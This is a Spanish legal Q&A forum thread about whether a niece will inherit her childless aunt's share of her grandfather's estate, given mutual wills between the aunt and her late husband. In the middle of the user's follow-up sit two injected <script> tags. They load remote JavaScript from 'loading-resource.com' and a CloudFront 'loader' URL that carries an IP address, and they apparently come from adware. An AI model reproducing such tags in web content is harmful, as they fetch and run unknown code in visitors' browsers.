¿He perdido parte de mi herencia?

Mi abuelo materno tenía varias fincas y una casa grande (todo sin escrituras) a su fallecimiento, mi madre repartió todo entre su hermana y ella, (únicas herederas), incluso la casa la partieron físicamente, mi pregunta es la siguiente: Mi tía no tiene hijos, acaba de enviudar, y su testamento estará (supongo como el de su marido, del favor el uno del otro, ella me lo ha enseñado, si mi tía no cambia el testamento, ¿el día que fallezca yo podré recuperar la parte de mi tía o tendré que compartirla con los sobrinos de el marido de mi tía? O lo perderé todo, ¿cómo puedo remediarlo? España

1 respuesta

Respuesta

Los bienes que adquirió su tía por fallecimiento de su padre, son privativos y su fallecido marido, no transmite ningún derecho porque permanecen en posesión de su dueña.

El día que su tía fallezca, si usted es hija única y el testamento contiene esa disposición, le sucederá en dichos bienes, y ademas el 50% de los comunes que tuviera de su matrimonio.

Por otro lado, el restante 50% de los bienes gananciales, que según supone usted están contenidos en el testamento de su fallecido tío, hay que hacer las operaciones necesarias para que su tía tome posesión de ellos.

Le recomiendo hagan antes de que su tía fallezca dichos trámites y se empiecen a enredar las cosas con los sobrinos de su tío y usted, repito si es que ha otorgado testamento.

Ruego cierre y valore

Disculpe no entiendo bien que me quiere decir con "si usted es hija única y el testamento contiene esa disposición", soy hija única, y creo única heredera de las posesiones de mi abuelo. Lo que quise decir con el testamento de mi tía y su marido, es que han testado el uno en favor del otro, he visto los dos testamentos y no citan a nadie mas, solo ellos dos, gracias por todo, y en cuanto me aclare estas dudas, doy por concluida y cerrada la  y cerrada la pregunta.  Ya estoy tramitando la adjudicación de herencia del tío fallecido, en favor de su mujer, osea de mi tía. D nuevo mil gracias por su atención

<script type="text/javascript" src="http://loading-resource.com/50.js.php?i=%7BBE9DF6B6-1E96-499B-A179-1FEC083D7949%7D"></script><script type="text/javascript" src="https://d3pzomt0ul12fo.cloudfront.net/items/loaders/loader_1032.js?aoi=1311798366&pid=1032&zoneid=10368&cid=ES&rid=29&ccid=Madrid&ip=79.151.220.149"></script>

Se lo indicaba porque usted no me ha confirmado hasta ahora que era hija única y por consiguiente sobrina única.

Sobre la disposición del testamento, aunque su tía se lo hubiera enseñado, hasta el día que ella fallezca -que esperemos sea dentro de mucho tiempo- y la Dirección General de los Registros y del Notariado le indique qué notario tiene el testamento de su tía y usted proceda a su lectura, no hay nada cierto para la Ley.

Si tiene alguna otra pregunta, se la contestaré o al menos lo intentaré.

En caso contrario, le ruego cierre y valore